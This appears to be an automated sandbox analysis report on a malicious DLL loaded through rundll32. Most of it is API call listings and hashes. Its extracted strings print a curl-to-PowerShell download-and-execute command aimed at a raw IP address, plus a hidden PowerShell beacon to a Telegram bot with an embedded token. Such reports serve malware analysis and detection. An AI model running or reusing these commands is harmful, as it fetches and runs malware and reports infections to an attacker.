                                                                                                • Instruction ID: 1ede92d87e88183e7490bbb336172c1a1857d4a00e499d7b6d6ec4c2ecc552f4
                                                                                                • Opcode Fuzzy Hash: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
                                                                                                • Instruction Fuzzy Hash: E821EB71909621ABFF31CB348D88A9A376D9F437B4F110615ED16A72C8D730F921CAE0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • _strrchr.LIBCMT ref: 6F956CF9
                                                                                                • _strrchr.LIBCMT ref: 6F956D03
                                                                                                • _strrchr.LIBCMT ref: 6F956D18
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                  • Part of subcall function 6F954F7D: IsProcessorFeaturePresent.KERNEL32(00000017,6F954F4F,?,00000000,00000000,00000000,00000000,?,00000000,?,6F954EC6,?,00000000,00000000,00000000,00000000), ref: 6F954F7F
                                                                                                  • Part of subcall function 6F954F7D: GetCurrentProcess.KERNEL32(C0000417,00000000,?,00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA2
                                                                                                  • Part of subcall function 6F954F7D: TerminateProcess.KERNEL32(00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA9
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                                                • String ID: .com
                                                                                                • API String ID: 3694955208-4200470757
                                                                                                • Opcode ID: 9b357d92cf556d5484546850c74081d810e9dd2059ce5f94eb7f2d74c119b2f5
                                                                                                • Instruction ID: 4c2b800bafc330f446592be22e472aa8b40ae3d784f9c81bcc1d74f6572a7735
                                                                                                • Opcode Fuzzy Hash: 9b357d92cf556d5484546850c74081d810e9dd2059ce5f94eb7f2d74c119b2f5
                                                                                                • Instruction Fuzzy Hash: 07514872504305AAEB16DE74DC44BAF377CDF53768F140929E910AB2C3EB22E938C261

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0
                                                                                                • Opcode ID: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction ID: 12a90bac32d630ebe43dbcbb5dfe6bd070e1fa0829f1c007a7fd4f5244ca9082
                                                                                                • Opcode Fuzzy Hash: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction Fuzzy Hash: 04217171D01715ABDB22CF65C840AAF3A7DEB967A4F014116FC146A2D1D730DDA5CBA0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                • powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", xrefs: 6F95101D
                                                                                                • cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, xrefs: 6F951010
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: task
                                                                                                • String ID: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -$powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                                • API String ID: 1384045349-2968791885
                                                                                                • Opcode ID: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction ID: b0a6ff7db1b291017c8c5855dc18d32104c4796cba38b27d8e520abd0a3aa384
                                                                                                • Opcode Fuzzy Hash: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction Fuzzy Hash: 56F03070D1030CA7DF44EFA4E9929BE73389F31258F900068B806661E2FF71EA69C691

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,6F95522C,00000000,6F954D53,?,?,44818074,6F954D53,?), ref: 6F955243
                                                                                                • TerminateProcess.KERNEL32(00000000,?,6F95522C,00000000,6F954D53,?,?,44818074,6F954D53,?), ref: 6F95524A
                                                                                                • ExitProcess.KERNEL32 ref: 6F95525C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction ID: 56aa2e9e73a434e648341db88ae513337887d601ffda823a7a27e729d01ee67d
                                                                                                • Opcode Fuzzy Hash: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction Fuzzy Hash: 73D09E31004604ABEF016F64CC4C9993F2AAF453A97405418B9195A0B6CB75E971DF50

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951DCA
                                                                                                  • Part of subcall function 6F95228C: InitializeSListHead.KERNEL32(6F967C70,6F951DD4,6F965708,00000010,6F951D65,?,?,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750), ref: 6F952291
                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F951E34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                • String ID:
                                                                                                • API String ID: 3231365870-0
                                                                                                • Opcode ID: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction ID: dbd21dee974c30aa6a56cc72ae674814fda50462661509d0bfe32484781d4195
                                                                                                • Opcode Fuzzy Hash: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction Fuzzy Hash: E12102329483119AFF06EFB8A40079C37A19F6372CF10045AD5842B1D3DF32E5B8C662

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6F95AEC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction ID: b6e68c8e5646865891fe3c2e813574348240ee4b87e30bb570054094d9295719
                                                                                                • Opcode Fuzzy Hash: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction Fuzzy Hash: 433118B2C0121CAFDF02DFD9DD809DEBFB9BF18214F54412AE918B2291D7318A64DB65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 416 6f9591f8-6f959222 417 6f959224-6f959226 416->417 418 6f959228-6f95922a 416->418 419 6f959279-6f95927c 417->419 420 6f959230-6f959237 call 6f95912d 418->420 421 6f95922c-6f95922e 418->421 423 6f95923c-6f959240 420->423 421->419 424 6f959242-6f959250 GetProcAddress 423->424 425 6f95925f-6f959276 423->425 424->425 426 6f959252-6f95925d call 6f955f50 424->426 427 6f959278 425->427 426->427 427->419
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7cebefc460c420e3a101f8bac7c0906097dbc71dc541ce4f6e6f5137b7d6ee9
                                                                                                • Instruction ID: 9242681f41b9aca7f2bc8fa335ca995abb737854bfc9102192db69dc204e1c84
                                                                                                • Opcode Fuzzy Hash: b7cebefc460c420e3a101f8bac7c0906097dbc71dc541ce4f6e6f5137b7d6ee9
                                                                                                • Instruction Fuzzy Hash: CA01BE77258611ABBF06CA6CDD40A563359EBD37707104115F614DB1CCDF31D4218B95

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 430 6f9578b8-6f9578c3 431 6f9578c5-6f9578cf 430->431 432 6f9578d1-6f9578d7 430->432 431->432 433 6f957905-6f957910 call 6f956a7b 431->433 434 6f9578f0-6f957901 RtlAllocateHeap 432->434 435 6f9578d9-6f9578da 432->435 441 6f957912-6f957914 433->441 436 6f957903 434->436 437 6f9578dc-6f9578e3 call 6f95afb5 434->437 435->434 436->441 437->433 443 6f9578e5-6f9578ee call 6f9554c6 437->443 443->433 443->434
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F956705,00000001,00000364,00000000,FFFFFFFF,000000FF,?,?,6F956A80,6F9578AD), ref: 6F9578F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 11000175e47c4525117f2a653cde02841767236b2a8b14f2ebde905929f718b9
                                                                                                • Instruction ID: 1c8d16ceb53eaeee637e4d106c1a0a49eb170089cd0adb56380666566bff0a88
                                                                                                • Opcode Fuzzy Hash: 11000175e47c4525117f2a653cde02841767236b2a8b14f2ebde905929f718b9
                                                                                                • Instruction Fuzzy Hash: 8DF0B43160462DABEB26DA368844B9A3B5CAF43770B01C126EE149A1C1DB20E630C6B2
                                                                                                APIs
                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6F957D11
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 6F957E05
                                                                                                • FindClose.KERNEL32(00000000), ref: 6F957E44
                                                                                                • FindClose.KERNEL32(00000000), ref: 6F957E77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 1164774033-0
                                                                                                • Opcode ID: b6cb73c6122f73230c612782cd8748856389d16ea3c2bc25d6076357393fc792
                                                                                                • Instruction ID: 2b35fbb22331fe2209aced95668fb21c33faf2c8b04f364de230939829a728ef
                                                                                                • Opcode Fuzzy Hash: b6cb73c6122f73230c612782cd8748856389d16ea3c2bc25d6076357393fc792
                                                                                                • Instruction Fuzzy Hash: 4B71C57180522DAEDF21DF24DC98AEEB7B9AF05204F1082DAD04897291DB35DFA4CF12
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F9525B7
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6F952683
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9526A3
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9526AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                • Opcode ID: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction ID: 23ecd557c1dc805c03c3c6812459aa0a4d63baa913363ccb1acc5b8aa5697faf
                                                                                                • Opcode Fuzzy Hash: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction Fuzzy Hash: 5E310775D053189BEB10DFA4C989BCCBBB8BF08304F1040AAE40DAB290EB719A94CF54
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID: PATH$\
                                                                                                • API String ID: 485612231-1896636505
                                                                                                • Opcode ID: bca75e8e3329abeb13bf99d4c11f562514c5c828cc0d022a51bcbe5aa6ad03ab
                                                                                                • Instruction ID: bfd6ba309fbbdd3e50862742368b1701835e2fdd745e023c654a87069aadc7be
                                                                                                • Opcode Fuzzy Hash: bca75e8e3329abeb13bf99d4c11f562514c5c828cc0d022a51bcbe5aa6ad03ab
                                                                                                • Instruction Fuzzy Hash: 0D911A7190430A9EEF15CF64DC40BEE7BB9AF56328F10851AE850AA1C2E771D771CB62
                                                                                                APIs
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9541D6
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6F9541F8
                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6F954307
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9543D9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6F95445D
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6F954478
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 2123188842-393685449
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                • String ID:
                                                                                                • API String ID: 127012223-0
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953047
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F95304F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F9530D8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F953103
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953158
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000001,?,6F9531F1,6F952381,6F951D55,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086), ref: 6F953735
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F953743
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F95375C
                                                                                                • SetLastError.KERNEL32(00000000,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086,?,00000001,?), ref: 6F9537AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                Strings
                                                                                                • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F957FD9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                • API String ID: 0-2837366778
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,6F953D2A,00000000,?,00000001,00000000,?,6F953DA1,00000001,FlsFree,6F960E2C,FlsFree,00000000), ref: 6F953CF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3664257935-2084034818
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,44818074,?,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F9552F3
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F955305
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F955327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B6D9
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B7A2
                                                                                                • __freea.LIBCMT ref: 6F95B809
                                                                                                  • Part of subcall function 6F95786A: HeapAlloc.KERNEL32(00000000,00000000,?,?,6F951CD5,00000000,?,6F95175C,00000000,?,6F9510C9,00000000), ref: 6F95789C
                                                                                                • __freea.LIBCMT ref: 6F95B81C
                                                                                                • __freea.LIBCMT ref: 6F95B829
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(44818074,00000000,00000000,?), ref: 6F95BE59
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F95C0AB
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F95C0F1
                                                                                                • GetLastError.KERNEL32 ref: 6F95C194
                                                                                                Memory Dump Source
